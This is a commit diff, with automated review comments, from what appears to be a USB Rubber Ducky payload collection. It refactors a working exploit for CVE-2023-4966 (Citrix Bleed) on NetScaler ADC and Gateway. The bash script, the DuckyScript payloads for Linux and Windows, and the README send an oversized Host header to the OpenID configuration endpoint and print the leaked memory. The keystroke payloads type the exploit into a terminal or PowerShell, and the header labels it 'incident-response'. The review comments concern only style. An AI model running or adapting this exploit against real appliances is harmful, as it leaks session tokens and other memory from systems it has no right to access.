Adapted to the use of variables
[+] Added vars [+] Attackmode [-] Img replaced with a link [+] README adapted to the new payload
pull/671/head
parent bc056509f0
commit 9892715933
@ -43,17 +43,18 @@ The following supported versions of NetScaler ADC and NetScaler Gateway are affe
This bulletin only applies to customer-managed NetScaler ADC and NetScaler Gateway products. Customers using Citrix-managed cloud services or Citrix-managed Adaptive Authentication do not need to take any action.

![](./assets/1.png)
![](https://i.ibb.co/x7SRvGf/1.png)

***Source**: The information was acquired from the official website of [support.citrix.com](#sources).*

## Settings

The sole configuration parameter that requires modification is the hostname, which represents the IP address (without protocol) of the target Citrix ADC / Gateway machine, such as 192.168.1.200. To configure this setting, you need to edit the "payload.txt" file to specify the desired address.
The sole configuration parameter that requires modification is the HOSTNAME, which represents the IP address (without protocol) of the target Citrix ADC / Gateway machine, such as 192.168.1.200. To configure this setting, you need to edit the payload.txt file to specify the desired address.

```DuckyScript
* REM Replace #HOSTNAME with your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
QUACK STRING $uri = "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration"
```plaintext
HOSTNAME='192.168.1.200'
...
QUACK STRING $uri = "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration"
```

## Payload Description Windows

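Review bot: the Settings snippet switches its fence from `DuckyScript` to `plaintext` and now mixes a bare `HOSTNAME='192.168.1.200'` assignment with a `QUACK STRING` line, but the prose never says that `$HOSTNAME` is substituted by the payload before the text is typed; add one sentence stating that, and keep the `DuckyScript` fence tag so the block is read as payload syntax rather than shell. The screenshot also moves from `./assets/1.png` to `https://i.ibb.co/x7SRvGf/1.png`, so the README now depends on a third-party image host; keeping the image in the repository avoids a broken image (and an external fetch on every render) if that host changes.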
@ -82,10 +83,10 @@ Here, a variable `$headers` is created as a hashtable containing the HTTP header
$headers = @{ 'Host' = $header_value }
```

This line defines the variable `$uri`, which contains the target URL for the HTTP request. Note that "#HOSTNAME" is a DuckyScript variable that should be replaced with the actual value before executing the script (see the [Settings](#settings) section).
This line defines the variable `$uri`, which contains the target URL for the HTTP request. Note that "$HOSTNAME" is a DuckyScript variable that should be replaced with the actual value before executing the script (see the [Settings](#settings) section).

```powershell
$uri = "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration"
$uri = "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration"
```

Here, the HTTP request to the specified URL is executed using the GET method and with the headers defined in the `$headers` variable. The result of the request is stored in the `$response` variable.

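Review bot: the sentence still says `$HOSTNAME` "should be replaced with the actual value before executing the script", which no longer matches the new flow where the value is assigned once in the VARIABLES block and substituted into the typed PowerShell; reword it to say the value comes from the `HOSTNAME` setting. Since `$HOSTNAME` is also valid PowerShell syntax, the same sentence should make clear that the substitution happens in the payload, not in the shell session.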
@ -130,7 +131,7 @@ headers="-H 'Host:$header_value'"
This line uses cURL to send a request to the specified URL with the constructed `headers`. The `-s` flag suppresses progress meter and error messages, while the `-k` flag allows cURL to perform an insecure SSL connection. The `--connect-timeout 10` flag sets a connection timeout of 10 seconds. The response is stored in the `response` variable.

```bash
response=$(curl -s -k -H "$headers" "https://$hostname/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
response=$(curl -s -k -H "$headers" "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
```

In this block, it checks if the exit status of the cURL command is 0 (indicating a successful request) and if the first three characters of the response are "200" (HTTP success code). If both conditions are met, it prints `--- Dumped memory ---`, followed by a portion of the response starting from character 131,051, and then indicates that the hostname is vulnerable. If the conditions are not met, it prints `Could not dump memory`.

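Review bot: `HOSTNAME` is the variable bash itself pre-populates with the local machine name, so reusing it for the target is easy to misread, and the description only says "the specified URL" without stating where the value comes from; a more specific name such as `TARGET_HOST` (hypothetical), used consistently in script.sh and both payloads, would remove the ambiguity. Minor documentation point: `-k` disables TLS certificate verification; "allows cURL to perform an insecure SSL connection" should say that explicitly.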
@ -139,7 +140,7 @@ In this block, it checks if the exit status of the cURL command is 0 (indicating
if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then
echo "--- Dumped memory ---"
echo "$response" | cut -c 131051-
echo "The #HOSTNAME is vulnerable!"
echo "The $HOSTNAME is vulnerable!"
echo "--- End ---"
else
echo "Could not dump memory"

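Review bot: style point on `[ "$(echo $response | cut -c 1-3)" == "200" ]`: `$response` is unquoted inside the `echo`, so it is word-split and glob-expanded before `cut` sees it, while the very next line quotes it as `"$response"`; quote it in both places. `==` inside `[ ]` is a bash extension; `=` is the portable form.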
@ -148,7 +149,7 @@ fi
## Script sh

The script.sh script accepts one parameter, which should be the target hostname without the application of a protocol (e.g., `192.168.1.200`). It uses this parameter to perform a specific action in the exploit.
The script.sh script accepts one parameter, which should be the target HOSTNAME without the application of a protocol (e.g., `192.168.1.200`). It uses this parameter to perform a specific action in the exploit.

Example Execution:

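Review bot: capitalising "hostname" to "target HOSTNAME" in prose reads as if the argument were an environment variable; either keep the plain word or write the variable as code (`HOSTNAME`) and say the first argument is assigned to it. "Uses this parameter to perform a specific action in the exploit" is vague; say it is interpolated into the request URL, which is what the cURL line above shows.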
@ -166,14 +167,12 @@ After assigning execute permissions, the above command allows the user to run th
## Sources

- [1] Official source of information acquisition: https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967
- [2] Detect Rady: https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
- [3] Passive Windows Detect: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt
- [4] Red Hot Cyber post: https://www.redhotcyber.com/post/e-pubblico-lexploit-per-il-bug-critico-di-citrix-netscaler-adc-e-gateway-scopriamo-come-funziona/
1) Official source of information acquisition: https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967
2) Red Hot Cyber post: https://www.redhotcyber.com/post/e-pubblico-lexploit-per-il-bug-critico-di-citrix-netscaler-adc-e-gateway-scopriamo-come-funziona/

## Credits

<h2 align="center"> Aleff</h2>
<h2 align="center">Aleff</h2>
<div align=center>
<table>
<tr>

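Review bot: references [2] Detect Ready and [3] Passive Windows Detect are dropped from Sources, which is only correct if the README body no longer relies on those extensions; the payloads now open with `ATTACKMODE HID` instead, so please confirm no remaining paragraph still cites [2] or [3]. The list also changes style from `- [1]` to `1)`, which breaks any in-text `[n]` citations (the Source line earlier in this commit links to `#sources`); keep the bracketed numbering if the body cites that way. The `<h2 align="center"> Aleff</h2>` whitespace fix is fine.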
Binary file not shown. Before: Size: 61 KiB
@ -3,29 +3,29 @@
* REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
* REM # Author : Aleff #
* REM # Version : 1.0 #
* REM # Category : incident-response #
* REM # Category : incident-response #
* REM # Target : Citrix NetScaler ADV; NetScaler Gateway #
* REM # #
* REM ##################################################################################

* REM GNU/Linux Version
ATTACKMODE HID

QUACK REM VARIABLES
* REM 1) Define replacing into the $HOSTNAME var your target, so put here the Citrix ADC / Gateway target, excluding the protocol.
HOSTNAME='192.168.1.200'

QUACK DELAY 3000
QUACK CTRL-ALT t
QUACK DELAY 1000

QUACK STRING header_value=$(yes a | head -n 24576 | tr -d '\n')
QUACK ENTER
QUACK DELAY 500
QUACK STRING headers="-H 'Host:$header_value'"
QUACK ENTER
QUACK DELAY 500

* REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
QUACK STRING response=$(curl -s -k -H "$headers" "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
QUACK STRING response=$(curl -s -k -H "$headers" "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
QUACK ENTER
QUACK DELAY 500

QUACK STRING if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then
QUACK ENTER
QUACK DELAY 500

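Review bot: with `HOSTNAME='192.168.1.200'` now set in the VARIABLES block, the `* REM Define here your target ...` comment directly above the cURL line is stale and should be removed. The VARIABLES comment itself ("Define replacing into the $HOSTNAME var your target") is hard to parse; "Set $HOSTNAME to the target Citrix ADC / Gateway host, without the protocol (e.g. 192.168.1.200)" says the same thing. Two header nits visible in context: `Target : Citrix NetScaler ADV` should read `ADC`, and `Category : incident-response` does not describe what this payload does.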
@ -1,12 +1,12 @@
#!/bin/bash

hostname="$1" # first parameter
HOSTNAME="$1" # first parameter

header_value=$(yes a | head -n 24576 | tr -d '\n')

headers="-H 'Host:$header_value'"

response=$(curl -s -k -H "$headers" "https://$hostname/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
response=$(curl -s -k -H "$headers" "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)

if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then
echo "--- Dumped memory ---"

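Review bot: missing check: `HOSTNAME="$1"` is assigned without verifying that an argument was given, so running the script with no parameter builds the URL `https:///oauth/...`; add something like `[ -n "$1" ] || { echo "usage: $0 <hostname>" >&2; exit 1; }` before the assignment. Renaming `hostname` to `HOSTNAME` also overwrites the variable bash pre-sets to the local machine name; it works inside the script, but a distinct name (e.g. `TARGET_HOST`, hypothetical) removes the ambiguity for anyone reading or sourcing it.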
@ -8,7 +8,11 @@
* REM # #
* REM ##################################################################################

* REM Windows Version
ATTACKMODE HID

QUACK REM VARIABLES
* REM 1) Define replacing into the $HOSTNAME var your target, so put here the Citrix ADC / Gateway target, excluding the protocol.
HOSTNAME='192.168.1.200'

QUACK DELAY 3000
QUACK GUI r

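Review bot: the `* REM 1) Define replacing into the $HOSTNAME var your target ...` comment is the same garbled wording as in the Linux payload; a single clear line such as `REM Set $HOSTNAME to the target Citrix ADC / Gateway host (no protocol, e.g. 192.168.1.200)` would do in both files. `QUACK REM VARIABLES` also mixes the two comment styles used in the file (`* REM` everywhere else); pick one so the VARIABLES block is unmistakably a comment and not text to be typed.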
@ -16,30 +20,24 @@ QUACK DELAY 500
QUACK STRING powershell
QUACK ENTER
QUACK DELAY 1000

QUACK STRING $header_value = 'a' * 24576
QUACK ENTER
QUACK DELAY 500
QUACK STRING $header_value = $header_value -replace "\n", ""
QUACK ENTER
QUACK DELAY 500

QUACK STRING $headers="-H 'Host:$header_value'"
QUACK ENTER
QUACK DELAY 500

QUACK STRING $headers = @{'Host' = $header_value}
QUACK ENTER
QUACK DELAY 500

* REM Replace #HOSTNAME with your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
QUACK STRING $uri = "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration"
QUACK STRING $uri = "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration"
QUACK ENTER
QUACK DELAY 500
QUACK STRING $response = Invoke-RestMethod -Uri $uri -Headers $headers -Method GET -TimeoutSec 10
QUACK ENTER
QUACK DELAY 500

QUACK STRING if ($response.Substring(0, 3) -eq "200") {
QUACK ENTER
QUACK DELAY 500

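Review bot: if the `* REM Replace #HOSTNAME with your target ...` comment above the `$uri` line is kept, it is now stale: the value comes from the VARIABLES block and nothing called `#HOSTNAME` remains in the typed text, so drop it. Replacing the curl-style `$headers="-H 'Host:$header_value'"` string with the hashtable `@{'Host' = $header_value}` is the right shape for `Invoke-RestMethod -Headers`. Minor: `$header_value -replace "\n", ""` is a no-op on a value built from `'a' * 24576`, which contains no newlines, and can go along with its ENTER/DELAY lines.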